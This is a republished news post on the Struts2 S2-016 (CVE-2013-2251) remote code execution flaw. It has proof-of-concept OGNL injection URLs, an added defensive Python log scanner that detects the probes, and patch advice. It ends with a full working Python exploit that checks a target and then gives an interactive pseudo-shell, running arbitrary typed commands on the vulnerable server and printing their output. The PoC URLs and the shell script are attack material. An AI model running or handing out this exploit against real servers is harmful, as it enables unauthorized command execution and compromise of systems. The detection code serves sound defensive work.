2025-01-15 Update From: SLTechnology News&Howtos
Shulou (Shulou.com) 06/01 Report
On July 17, I woke up from a nap at noon and saw a few familiar words: Struts2, remote code execution. Could a new one have been disclosed since the last one? I wasn't awake yet; then I was suddenly wide awake. I checked right away, and a certain cloud had already been flooded with it. A bloody scene was about to be staged.
It is reported that the affected versions are Struts 2.0.0 through 2.3.15 (CVE-2013-2251, Struts advisory S2-016). The cause is that the values carried by the action:, redirect: and redirectAction: parameter prefixes are not filtered correctly, so anyone who can reach an application built on Struts2 can remotely execute arbitrary OGNL expressions, and through OGNL arbitrary Java code.
Vulnerability proof (%25 is the URL-encoded percent sign, so the server receives %{3*4}; a vulnerable host evaluates the expression, and the redirect: variant answers with a 302 whose Location header ends in the result, 12, instead of the literal expression):
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-blank/example/X.action?redirect:%25{3*4}
http://host/struts2-blank/example/X.action?redirectAction:%25{3*4}
Code execution test (the ProcessBuilder argument array is a placeholder: put the real command and each of its arguments in as separate array elements):
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
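Defenders will want the other side of the PoCs above: recognising these probes in web server logs and reading the answer to the harmless arithmetic probe. The following is an added example written for this page, not Terry's tool or any Struts project code. It decodes the parameter names the way a servlet container would, flags the three S2-016 prefixes only when an OGNL marker follows them, and runs over a few constructed Combined Log Format lines (the hosts, addresses and timestamps are made up; the first two requests mirror the PoC URLs on this page). It also generalises slightly: it accepts both the %{...} and ${...} OGNL delimiters, and it leaves a legitimate redirect:home untouched.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Parameter-name prefixes that Struts2's DefaultActionMapper interprets and that
# S2-016 / CVE-2013-2251 lets an attacker abuse (the same three as the PoCs).
PREFIXES = ("action:", "redirect:", "redirectAction:")

# An OGNL expression marker after URL-decoding: %{...} or ${...}.
OGNL_RE = re.compile(r"[%$]\{.*\}", re.S)


def find_s2016_params(query):
    """Return [(prefix, decoded_payload)] for each suspicious parameter in a query string.

    Struts reads the *name* of the parameter, so the payload is the part of the
    name after the prefix. The name is split from the value on the raw '=' and
    then URL-decoded once, which is what the servlet container does.
    """
    hits = []
    for pair in query.split("&"):
        if not pair:
            continue
        name = unquote_plus(pair.split("=", 1)[0])
        for prefix in PREFIXES:
            if name.startswith(prefix):
                payload = name[len(prefix):]
                if OGNL_RE.search(payload):
                    hits.append((prefix, payload))
    return hits


def scan_access_log(lines):
    """Scan Combined Log Format lines; return [(client_ip, path, prefix, payload)]."""
    log_re = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')
    findings = []
    for line in lines:
        m = log_re.match(line)
        if not m:
            continue
        ip, target = m.group(1), m.group(2)
        parts = urlsplit(target)
        for prefix, payload in find_s2016_params(parts.query):
            findings.append((ip, parts.path, prefix, payload))
    return findings


def probe_confirms(location_header, expected):
    """Interpret the answer to a harmless redirect:%{a*b} probe.

    A vulnerable host evaluates the expression and redirects to '.../<a*b>';
    a patched host leaves the literal (encoded) expression in the Location or
    rejects the request. Only the last path segment is compared.
    """
    last = location_header.rstrip("/").rsplit("/", 1)[-1]
    return last == str(expected)


# Constructed sample log lines (not real traffic): the first two mirror the PoC
# URLs from this page, the third is ordinary traffic, and the fourth uses the
# redirect: prefix legitimately and must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [17/Jul/2013:13:02:11 +0800] "GET /struts2-blank/example/X.action?redirect:%25{3*4} HTTP/1.1" 302 0 "-" "curl/7.31.0"
198.51.100.9 - - [17/Jul/2013:13:02:15 +0800] "GET /struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'whoami'})).start()} HTTP/1.1" 200 12 "-" "Python-urllib/2.7"
192.0.2.4 - - [17/Jul/2013:13:03:40 +0800] "GET /struts2-showcase/employee/list.action?page=2 HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
192.0.2.4 - - [17/Jul/2013:13:04:01 +0800] "POST /struts2-showcase/employee/save.action?redirect:home HTTP/1.1" 302 0 "-" "Mozilla/5.0"
""".splitlines()


if __name__ == "__main__":
    for ip, path, prefix, payload in scan_access_log(SAMPLE_LOG):
        print("S2-016 probe from %s on %s via %s -> %s" % (ip, path, prefix, payload))
```

Running the script prints two findings: the arithmetic probe from 203.0.113.7 and the ProcessBuilder payload from 198.51.100.9. The ordinary page request and the plain redirect:home are not reported, because the prefix alone is a normal Struts feature; it is the OGNL marker in the parameter name that makes the request a probe.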
An official patch has been released; administrators should apply it right away, or they won't even know when their pants have been pulled down.
URL: http://struts.apache.org/download.cgi#struts23151 (Struts 2.3.15.1)
The Python tool below is shown in the following figure: [figure]
A Google search nearly scared the piss out of me. Once again I strongly suggest that admins work overtime tonight to fix this! Good night.
-- Update: the Python script --
#!/usr/bin/env python3
# -*- coding: UTF-8 -*-
#
# Struts2 2.0.0 - Struts 2.3.15  CVE-2013-2251
#
# Copyright By Terry, all rights reserved
# author   date        comment
# Terry    2013-7-17   Created
#
# Editor's note: reconstructed from the garbled listing on the page and ported
# from urllib2/raw_input to Python 3; the payload and behaviour are unchanged.

import re
import sys
from urllib.request import Request, urlopen

# OGNL payload carried in the redirect: parameter name: run 'whoami' through
# ProcessBuilder, read its stdout into a char buffer and write the buffer
# straight into the HTTP response (so the command output comes back as the body).
url_exp = ("?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),"
           "%23b%3d%23a.getInputStream(),"
           "%23c%3dnew%20java.io.InputStreamReader(%23b),"
           "%23d%3dnew%20java.io.BufferedReader(%23c),"
           "%23e%3dnew%20char[50000],"
           "%23d.read(%23e),"
           "%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),"
           "%23matt.getWriter().println(%23e),"
           "%23matt.getWriter().flush(),"
           "%23matt.getWriter().close()}")


def judge(url):
    # determine whether the vulnerability exists: a vulnerable host answers with
    # the raw command output, a patched one answers with an HTML page (contains '>')
    if url.endswith(".action"):
        try:
            url = url + url_exp
            response = urlopen(Request(url))
            res_html = response.read().decode("utf-8", "replace")
            if res_html.find(">") > 0:
                return "Failed"
            else:
                return "OK"
        except Exception:
            return "ERROR"
    else:
        return "url error"


def get_args(argument):
    # convert "ls -al" into the OGNL array-literal form 'ls','-al'
    args = argument.split(' ')
    args_deal = ''
    for i in args:
        args_deal = args_deal + "'" + i + "',"
    args_deal = args_deal[:-1]
    return args_deal


def strip_nul(s):
    # remove the \x00 padding left by the unfilled 50000-char buffer
    tmp = s.strip()
    blank_line = re.compile('\x00')
    tmp = blank_line.sub('', tmp)
    return tmp


def attack(url):
    # DO IT: send the request and return the command output
    try:
        response = urlopen(Request(url))
        res_html = response.read().decode("utf-8", "replace").strip()
        return strip_nul(res_html)
    except Exception:
        return "ERROR"


if __name__ == '__main__':
    if len(sys.argv) > 1:
        if judge(sys.argv[1]) == "OK":
            print("Success")
            pattern = re.compile(r'http[s]?://([\w\W]*?)/')
            url = sys.argv[1] + url_exp
            hostname = pattern.findall(url)
            # interactive pseudo-shell: each line typed replaces 'whoami' in the payload
            while True:
                string = input(hostname[0] + ">")
                if string.startswith("exit"):
                    break
                if len(string) > 0:
                    url_ = url.replace("'whoami'", get_args(string))
                    print(attack(url_))
        else:
            print("Failed")
    else:
        print("No argument!")